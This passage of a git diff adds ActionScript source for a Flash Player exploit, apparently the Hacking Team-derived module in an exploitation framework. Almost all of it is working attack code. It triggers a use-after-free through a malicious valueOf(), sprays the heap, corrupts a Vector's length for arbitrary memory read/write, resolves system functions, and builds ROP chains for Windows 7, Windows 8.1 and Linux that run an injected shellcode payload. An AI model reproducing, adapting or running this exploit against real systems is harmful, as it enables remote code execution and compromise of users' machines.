+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/hacking_team/Exploit.as b/external/source/exploits/hacking_team/Exploit.as
new file mode 100755
index 0000000000..e80733e3f0
--- /dev/null
+++ b/external/source/exploits/hacking_team/Exploit.as
@@ -0,0 +1,37 @@
+package 
+{
+	import flash.display.Sprite
+	import flash.events.Event
+	import mx.utils.Base64Decoder
+	import flash.display.LoaderInfo
+	import flash.utils.ByteArray
+	
+	public class Exploit extends Sprite 
+	{
+		private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+		
+		public function Exploit():void 
+		{
+			//trace("Got to checkpoint 0");
+			if (stage) init();
+			else addEventListener(Event.ADDED_TO_STAGE, init);
+		}
+		
+		private function init(e:Event = null):void 
+		{
+			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+
+			removeEventListener(Event.ADDED_TO_STAGE, init);
+			MyClass.TryExpl(this, platform, os, payload)
+		}
+	}
+}
\ No newline at end of file
diff --git a/external/source/exploits/hacking_team/ExploitByteArray.as b/external/source/exploits/hacking_team/ExploitByteArray.as
new file mode 100755
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/hacking_team/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/hacking_team/ExploitVector.as b/external/source/exploits/hacking_team/ExploitVector.as
new file mode 100755
index 0000000000..18aa4778a0
--- /dev/null
+++ b/external/source/exploits/hacking_team/ExploitVector.as
@@ -0,0 +1,75 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint 
+        
+        public function ExploitVector(v:Vector.<uint>, length:uint)
+        {
+            uv = v
+            original_length = length
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/hacking_team/Exploiter.as b/external/source/exploits/hacking_team/Exploiter.as
new file mode 100755
index 0000000000..ecbf56fac5
--- /dev/null
+++ b/external/source/exploits/hacking_team/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv, uv_length)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/hacking_team/Logger.as b/external/source/exploits/hacking_team/Logger.as
new file mode 100755
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/hacking_team/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/hacking_team/MyClass.as b/external/source/exploits/hacking_team/MyClass.as
new file mode 100755
index 0000000000..562151e737
--- /dev/null
+++ b/external/source/exploits/hacking_team/MyClass.as
@@ -0,0 +1,93 @@
+package
+{
+	import flash.display.DisplayObjectContainer;
+	import flash.utils.ByteArray;
+	import flash.system.Capabilities;
+	import flash.events.MouseEvent;
+	import flash.external.ExternalInterface;
+	
+	public class MyClass
+	{
+		static var 
+			_gc:Array, 
+			_va:Array,
+			_ba:ByteArray,
+			_isDbg:Boolean = Capabilities.isDebugger;
+		
+		// define malicious valueOf()
+		prototype.valueOf = function ()
+		{
+			Logger.log("MyClass.valueOf()");
+			
+			_va = new Array(5);
+			_gc.push(_va); // protect from GC // for RnD
+			
+			// reallocate _ba storage
+			_ba.length = 0x1100;
+			
+			// reuse freed memory
+			for(var i:int; i < _va.length; i++)
+				_va[i] = new Vector.<uint>(0x3f0);
+			
+			// return one byte for overwriting
+			return 0x40;
+		}
+		
+		// try to corrupt the length value of Vector.<uint>
+		static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray) : Boolean
+		{
+            Logger.log("tryexpl")
+			try
+			{
+				var alen:int = 90; // should be multiply of 3
+				var a = new Array(alen);
+				if (_gc == null) _gc = new Array();
+				_gc.push(a); // protect from GC // for RnD
+				
+				// try to allocate two sequential pages of memory: [ ByteArray ][ MyClass2 ]
+				for(var i:int; i < alen; i+=3){
+					a[i] = new MyClass2(i);
+					
+					a[i+1] = new ByteArray();
+					a[i+1].length = 0xfa0;
+					
+					a[i+2] = new MyClass2(i+2);
+				}
+				
+				// find these pages
+				var v:Vector.<uint>;
+				for(i=alen-5; i >= 0; i-=3)
+				{
+					// take next allocated ByteArray
+					_ba = a[i];
+					// call valueOf() and cause UaF memory corruption 
+					_ba[3] = new MyClass();
+					// _ba[3] should be unchanged 0
+					Logger.log("_ba[3] = " + _ba[3]);
+					if (_ba[3] != 0) throw new Error("can't cause UaF");
+					
+					// check results // find corrupted vector
+					for(var j:int=0; j < _va.length; j++){
+						v = _va[j];
+						if (v.length != 0x3f0) {
+							Logger.log("v.length = 0x" + v.length.toString(16));
+							var exploiter:Exploiter = new Exploiter(e, platform, os, payload, v, 0x3f0)
+							Logger.log("v.length = 0x" + v.length.toString(16));
+							return true
+						}
+					}
+				}
+				
+				Logger.log("bad allocation. try again."); 
+			}
+			catch (e:Error) 
+			{
+				Logger.log("TryExpl() " + e.toString());
+			}
+			
+			return false;
+		}
+		
+	}
+
+}
\ No newline at end of file
diff --git a/external/source/exploits/hacking_team/MyClass1.as b/external/source/exploits/hacking_team/MyClass1.as
new file mode 100755
index 0000000000..84ba8381eb
--- /dev/null
+++ b/external/source/exploits/hacking_team/MyClass1.as
@@ -0,0 +1,9 @@
+package
+{
+	import flash.utils.ByteArray;
+	
+	class MyClass1 extends ByteArray
+	{
+		var o1:Object, o2:Object, o3:Object, o4:Object;
+	}	
+}
\ No newline at end of file
diff --git a/external/source/exploits/hacking_team/MyClass2.as b/external/source/exploits/hacking_team/MyClass2.as
new file mode 100755
index 0000000000..c6c82ae2e0
--- /dev/null
+++ b/external/source/exploits/hacking_team/MyClass2.as
@@ -0,0 +1,115 @@
+package
+{
+	class MyClass2 extends MyClass1
+	{
+		var					
+			// enlarge the MyClass2 size by dummy attributes
+			a0 :uint, a1 :uint, a2 :uint, a3 :uint, a4 :uint, a5 :uint, a6 :uint, a7 :uint, a8 :uint, a9 :uint, 
+			a10:uint, a11:uint, a12:uint, a13:uint, a14:uint, a15:uint, a16:uint, a17:uint, a18:uint, a19:uint,
+			a20:uint, a21:uint, a22:uint, a23:uint, a24:uint, a25:uint, a26:uint, a27:uint, a28:uint, a29:uint, 
+			a30:uint, a31:uint, a32:uint, a33:uint, a34:uint, a35:uint, a36:uint, a37:uint, a38:uint, a39:uint, 
+			a40:uint, a41:uint, a42:uint, a43:uint, a44:uint, a45:uint, a46:uint, a47:uint, a48:uint, a49:uint, 
+			a50:uint, a51:uint, a52:uint, a53:uint, a54:uint, a55:uint, a56:uint, a57:uint, a58:uint, a59:uint, 
+			a60:uint, a61:uint, a62:uint, a63:uint, a64:uint, a65:uint, a66:uint, a67:uint, a68:uint, a69:uint, 
+			a70:uint, a71:uint, a72:uint, a73:uint, a74:uint, a75:uint, a76:uint, a77:uint, a78:uint, a79:uint, 
+			a80:uint, a81:uint, a82:uint, a83:uint, a84:uint, a85:uint, a86:uint, a87:uint, a88:uint, a89:uint, 
+			a90:uint, a91:uint, a92:uint, a93:uint, a94:uint, a95:uint, a96:uint, a97:uint, a98:uint, a99:uint,
+			
+			a100:uint, a101:uint, a102:uint, a103:uint, a104:uint, a105:uint, a106:uint, a107:uint, a108:uint, a109:uint,
+			a110:uint, a111:uint, a112:uint, a113:uint, a114:uint, a115:uint, a116:uint, a117:uint, a118:uint, a119:uint,
+			a120:uint, a121:uint, a122:uint, a123:uint, a124:uint, a125:uint, a126:uint, a127:uint, a128:uint, a129:uint,
+			a130:uint, a131:uint, a132:uint, a133:uint, a134:uint, a135:uint, a136:uint, a137:uint, a138:uint, a139:uint,
+			a140:uint, a141:uint, a142:uint, a143:uint, a144:uint, a145:uint, a146:uint, a147:uint, a148:uint, a149:uint,
+			a150:uint, a151:uint, a152:uint, a153:uint, a154:uint, a155:uint, a156:uint, a157:uint, a158:uint, a159:uint,
+			a160:uint, a161:uint, a162:uint, a163:uint, a164:uint, a165:uint, a166:uint, a167:uint, a168:uint, a169:uint,
+			a170:uint, a171:uint, a172:uint, a173:uint, a174:uint, a175:uint, a176:uint, a177:uint, a178:uint, a179:uint,
+			a180:uint, a181:uint, a182:uint, a183:uint, a184:uint, a185:uint, a186:uint, a187:uint, a188:uint, a189:uint,
+			a190:uint, a191:uint, a192:uint, a193:uint, a194:uint, a195:uint, a196:uint, a197:uint, a198:uint, a199:uint,
+
+			a200:uint, a201:uint, a202:uint, a203:uint, a204:uint, a205:uint, a206:uint, a207:uint, a208:uint, a209:uint,
+			a210:uint, a211:uint, a212:uint, a213:uint, a214:uint, a215:uint, a216:uint, a217:uint, a218:uint, a219:uint,
+			a220:uint, a221:uint, a222:uint, a223:uint, a224:uint, a225:uint, a226:uint, a227:uint, a228:uint, a229:uint, 
+			a230:uint, a231:uint, a232:uint, a233:uint, a234:uint, a235:uint, a236:uint, a237:uint, a238:uint, a239:uint,
+			a240:uint, a241:uint, a242:uint, a243:uint, a244:uint, a245:uint, a246:uint, a247:uint, a248:uint, a249:uint,
+			a250:uint, a251:uint, a252:uint, a253:uint, a254:uint, a255:uint, a256:uint, a257:uint, a258:uint, a259:uint,
+			a260:uint, a261:uint, a262:uint, a263:uint, a264:uint, a265:uint, a266:uint, a267:uint, a268:uint, a269:uint,
+			a270:uint, a271:uint, a272:uint, a273:uint, a274:uint, a275:uint, a276:uint, a277:uint, a278:uint, a279:uint,
+			a280:uint, a281:uint, a282:uint, a283:uint, a284:uint, a285:uint, a286:uint, a287:uint, a288:uint, a289:uint,
+			a290:uint, a291:uint, a292:uint, a293:uint, a294:uint, a295:uint, a296:uint, a297:uint, a298:uint, a299:uint,
+
+			a300:uint, a301:uint, a302:uint, a303:uint, a304:uint, a305:uint, a306:uint, a307:uint, a308:uint, a309:uint,
+			a310:uint, a311:uint, a312:uint, a313:uint, a314:uint, a315:uint, a316:uint, a317:uint, a318:uint, a319:uint,
+			a320:uint, a321:uint, a322:uint, a323:uint, a324:uint, a325:uint, a326:uint, a327:uint, a328:uint, a329:uint, 
+			a330:uint, a331:uint, a332:uint, a333:uint, a334:uint, a335:uint, a336:uint, a337:uint, a338:uint, a339:uint,
+			a340:uint, a341:uint, a342:uint, a343:uint, a344:uint, a345:uint, a346:uint, a347:uint, a348:uint, a349:uint,
+			a350:uint, a351:uint, a352:uint, a353:uint, a354:uint, a355:uint, a356:uint, a357:uint, a358:uint, a359:uint,
+			a360:uint, a361:uint, a362:uint, a363:uint, a364:uint, a365:uint, a366:uint, a367:uint, a368:uint, a369:uint,
+			a370:uint, a371:uint, a372:uint, a373:uint, a374:uint, a375:uint, a376:uint, a377:uint, a378:uint, a379:uint,
